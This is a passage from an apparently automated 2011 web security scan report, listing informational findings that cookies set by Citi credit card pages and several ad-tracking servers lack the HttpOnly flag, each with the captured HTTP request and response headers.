CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=43153&VTIPUB=705&TX=1308307242&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIVEN=1805&SID=DF3259D003E14F63AD487F4185EEA981; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308307241791

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:45:19 GMT
Location: http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631524242&ProspectID=82D8AD156EDD44FCB7E16445B26D706E
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: PCCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: PXCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=42945&VTIPUB=705&TX=1308307520&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&VTIVEN=1805&SID=82D8AD156EDD44FCB7E16445B26D706E; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=995AE0F7C91A4ECD81FEE7C2D4CEDD80; path=/
Set-Cookie: ATC9=46403d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199K3Gcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308307519699; expires=Fri, 17-Jun-2011 15:46:18 GMT; path=/
Date: Fri, 17 Jun 2011 10:45:19 GMT
Connection: close

11.88. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT%5F9=VTIVEN=1805&SID=F0BA75EED46846189B0AC8DBD524E4BC&VTILNK=0&VTIAS=0&VTI=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&TX=1308307229&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTITRF=49121&VTIPUB=705&VTI3PTY=&VTIEML=0; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBTSES=SID=995AE0F7C91A4ECD81FEE7C2D4CEDD80; path=/
ATC9=37872d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; expires=Fri, 17-Jun-2011 15:41:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_spredir.htm?BTData=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&BT_TRF=49121&app=UNSOL&sc=4T4ZJW71&m=4CJ5MDR210W&langId=EN&siteId=CB&B=M&screenID=3000&uc=AQV&t=t&link=Consumer_631523784 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144464&pg=1477&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308307220482; ATC9=39543d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1ccccccccc; CitiBTSES=SID=995AE0F7C91A4ECD81FEE7C2D4CEDD80; CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=42945&VTIPUB=705&TX=1308307220&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&VTIVEN=1805&SID=E5654139F6B747CBA7F80536311316E9; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:40:29 GMT
Location: http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm?BTData=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&BT_TRF=49121&app=UNSOL&sc=4T4ZJW71&m=4CJ5MDR210W&langId=EN&siteId=CB&B=M&screenID=3000&uc=AQV&t=t&link=Consumer%5F631523784&ProspectID=F0BA75EED46846189B0AC8DBD524E4BC
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: PXCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: PCCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=VTIVEN=1805&SID=F0BA75EED46846189B0AC8DBD524E4BC&VTILNK=0&VTIAS=0&VTI=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&TX=1308307229&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTITRF=49121&VTIPUB=705&VTI3PTY=&VTIEML=0; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=995AE0F7C91A4ECD81FEE7C2D4CEDD80; path=/
Set-Cookie: ATC9=37872d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; expires=Fri, 17-Jun-2011 15:41:28 GMT; path=/
Date: Fri, 17 Jun 2011 10:40:28 GMT
Connection: close

11.89. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 10:40:34 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A227478%3A112921cf20116d066717054a40e927; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 10:40:34 GMT; Path=/
lsn_track=UmFuZG9tSVaW6jp2Mr2CRQ0X6ULzI68IQG6YCv45HHNWoMG%2FWpbPCgUZC70qa5dY25ELTn6bG0L95MCoLETQrA%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 10:40:34 GMT; Path=/
lsclick_mid2291="2011-06-17 10:40:34.174|EhraRx8K_BE-8OpVti2WTAMLAYgaqyOFaA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 10:40:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.90. http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/Dividend/May2011/Q2/12mo/100cash/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/Dividend/May2011/Q2/12mo/100cash/default.htm?BTData=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&BT_TRF=49121&app=UNSOL&sc=4T4ZJW71&m=4CJ5MDR210W&langId=EN&siteId=CB&B=M&screenID=3000&uc=AQV&t=t&link=Consumer%5F631523784&ProspectID=F0BA75EED46846189B0AC8DBD524E4BC HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144464&pg=1477&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:40:33 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/
Date: Fri, 17 Jun 2011 10:40:33 GMT
Connection: close
Content-Length: 7534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...

11.91. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/MC/external/affiliate/Mar2011/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631523782&ProspectID=0054B2D103DB4175848F37B88E182CA1 HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=1477&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:40:33 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/
Date: Fri, 17 Jun 2011 10:40:32 GMT
Connection: close
Content-Length: 5829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

11.92. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631524418&ProspectID=E5654139F6B747CBA7F80536311316E9 HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:40:26 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/
Date: Fri, 17 Jun 2011 10:40:26 GMT
Connection: close
Content-Length: 5761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

11.93. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/thankyou/Preferred/external/May2011/50GC/default.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer%5F631524426&ProspectID=3F41C92F74AE43D4B3334B0467420B9F HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145660&pg=1477&pgpos=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; s_pers=%20gpv_p7%3DMay_2011_DividendPlatSelect_MC_12%252F12_%2524100cashback%7C1308309039568%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

11.94. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631523794&ProspectID=DF3259D003E14F63AD487F4185EEA981 HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=1477&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; s_pers=%20gpv_p7%3DMay_2011_DividendPlatSelect_MC_12%252F12_%2524100cashback%7C1308309039568%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

11.95. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ZFFAbh=879B826,20|1477_897#383Z120_879#365;expires=Fri, 15 Jun 2012 11:28:58 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.96. http://dis.ny.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.ny.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

udc=*1CHZCRgIx6nSg3nCboPSuV5GDm6LZbYWApuRyCJPc%2bhchb5KpLbYf1Lu3OAJhT9WT3pwfiRHdLJOgnKf1ltoJegC3En0YtacsPpePTD4Vs%2fel5n8GoLlWfnQY20hrwPZnMI%2f%2bu02gZCFZ%2f893laStaSW0gKAVim%2b7apphxKCZu%2fGGE4OLoXme7LscLiSH70QUWd7ic2Jkw03Gp1TD%2barlV5IK8T3LqodepWEE2%2bfRBZ%2b3e5oAKW6qyLfutMHEihHW38sVu6Sf%2bPeUlqCY7gNUpnYdq28lFf7ztFdkLFjaiSxpJtKKC9P5hcCP95gDyECw%2bU%2bsqiYKWtj9dgA2AWE2Mnuy9qWa1Z3X8BmvRSc4jiLNP4fqDVJ3yHP%2bj77%2fCz3%2b3KjBFLZxHWLnxM02HG4VHETRwakPRLdV8GRWD2Pu8UCkBaEArmq8gnJKTadUvDrcJFAzs2Z64TyIEcBIGNPmiqq0A5s8dlT6pHXfpVKdrGMCV%2bHNgcaATshFiot5B9ZUWGqt37zae6vVQXHZs5lOlEpDdIUevqT70JDoFoQsAd1CZdlIiSe0VHOH4lr2sDGyd%2bcSXSj1FQUtO6PesxcgG%2f6WhO%2bH6uK3Ei2JaDpbkj2c9OAvfD59v9OHkExPfwLwJDJF1tKaWLHjPs9r387HtpZFY%2bnsT7OnNp8AplcPjZI199i06M4IOr%2fBdxQ3V7I%2bd1MYpFWjcfIASVfiYk%2b61t6kMCEgwazHiqG%2f7pGlKHW%2fkO7vyHkQykQNRQXDZ1QatHtU66jDxwS2f687ENQXpZyjO5q9dpG8ta1%2fLLdEgFRvJ2RjW7UlAZfaRAZ0Qrek2AWVn2Bdr4MRioik3U2Mi4PZxQQ1oKJgppZDrEMhcaGgcokkkHIWQXIL9mS5sta4DEs%2bLDghGjVKQLGqd5j%2bVT1yQYcRUa8RWZfDev388BCRLoZXHEscuKd8%2frb2Ws2J5xCVAXmiW%2bUD3nZSpiHJG135wvdge42Ehp5wBJzORKShsF%2fWxtKIudx3YYaP788csoL8Ukzd5gDI79lCeQbLq8PnLEUBDsd3Mj3GaSJ5JMCnt%2fmPTrdxCRtc7HAH%2fu5ZxdNZiy0DjDUbVYiTJIytqTobFMhs%2f0lHktVdMI0C5RtZae4WL1SGluE3c1Au2waFBDoodGpjqRBGq6xSQJm3Iw%3d%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:10 GMT; path=/
dis=*1AIhVRSZrQgYu9x47ppfIGqqnT57MQO9KKEitnRSffraIMr16RaqB2jBwUTPWIs60iAfgOM%2bJyadJJMNrThoicjk6JBenkl27rLp7xnDfdVxENXrZoJIZ%2brOdTm%2bhZcp9HEu0Wsa6G79lcjBzWSIh4SpHnpBSph43jRgJXOPpaLg%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:10 GMT; path=/
udi=*1wQWNbHL2BkixwAS4DgWF1g%3d%3d; domain=.criteo.com; expires=Fri, 17-Jun-2011 13:08:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.97. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8170=734303; domain=.interclick.com; expires=Wed, 16-Jun-2021 11:32:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8170=734303; domain=.interclick.com; expires=Wed, 16-Jun-2021 11:32:15 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 11:32:15 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

11.98. http://ilslaunch.app2.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ilslaunch.app2.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT137=1796281516.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: ilslaunch.app2.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.ilslaunch.com/mission-control/mission-skyterra-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=KzEiwORKzQEkAAAANGY2Y2VjYjctMWM4Yi00ZDFjLTlhMWQtMmQ4OGQ0ZTFkOWNi0; expires=Fri, 15-Jun-2012 10:51:00 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=cd406f52-b24f-4879-9698-eac3c68f3d6f; domain=ilslaunch.app2.hubspot.com; expires=Wed, 16-Jun-2021 05:00:00 GMT; path=/; HttpOnly
Date: Thu, 16 Jun 2011 10:50:59 GMT
Set-Cookie: HUBSPOT137=1796281516.0.0000; path=/

var hsUse20Servers = true;
var hsDayEndsIn = 61739;
var hsWeekEndsIn = 320939;
var hsMonthEndsIn = 1271339;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-06-16 06:51
...[SNIP]...

11.99. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.76_1310782572; domain=pubmatic.com; expires=Mon, 26-May-2014 20:29:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.100. http://imp.constantcontact.com/imp/cmp.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.constantcontact.com
Path:	/imp/cmp.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

impcc="IMP_14302119028291151=21766357|IMP_14302119028289010=21804157|IMP_14302119028289010=21804157|IMP_14302119028205615=21803130|IMP_14302119028205613=21799456|"; expires=Wed, 14-Sep-2011 18:37:48 GMT; path=/; domain=.constantcontact.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.101. http://js.revsci.net/common/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/common/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

